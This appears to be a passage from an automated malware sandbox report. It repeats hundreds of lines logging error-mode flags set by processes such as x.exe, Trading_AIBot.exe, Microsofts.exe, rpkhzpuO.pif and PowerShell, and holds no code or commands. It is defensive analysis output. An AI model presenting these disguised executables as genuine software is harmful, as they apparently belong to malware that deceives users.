                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\Public\Libraries\rpkhzpuO.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\Microsofts.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
